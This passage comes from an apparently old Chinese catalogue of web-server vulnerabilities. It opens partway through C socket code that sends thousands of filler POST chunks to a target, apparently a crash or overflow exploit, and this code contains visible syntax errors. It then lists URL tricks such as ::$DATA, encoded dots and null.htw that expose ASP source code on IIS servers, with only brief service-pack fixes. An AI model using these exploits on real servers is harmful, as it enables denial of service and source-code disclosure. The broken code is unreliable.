|
CGI漏洞(16) { printf("Connect faild \n";; } else { lLen = send ( sockfd,plusvuln,strlen(plusvuln),0 ); for (lDo = 0 ;lDo < 7000;lDo ++) { lLen = send ( sockfd,"postinfdddddddddd",strlen("postinfdddddddddd",0) ; if (lLen < 0 ) { printf("Send faild \n"; return; } } lLen = send ( sockfd,"tzl.html HTTP/1.0\n\n",strlen("tzl.html HTTP/1.0\n\n" + 1,0) ; //recv(sockfd,buffer,2000,0); //printf(buffer); //printf("\n"; } closesocket(sockfd); } 二十九.asp原代码暴露
http://somewhere/something.asp::$DATA 解决方案: 装sp3 http://somewhere/something.asp%2e 解决方案: 装sp4
http://somewhere/something.asp.(加一个点) 解决方案: 装sp4
http://somewhere/something%2e%41sp 或者
http://somewhere/something%2e%asp 解决方案: 装sp4
http://somewhere/something.asp%81 解决方案:装sp6或者打补丁
三十.null.htw 如果你的web目录下有asp文件,如存 http://www.xxx.com/asp/index.asp,则输入如下路径可以看到源码:
|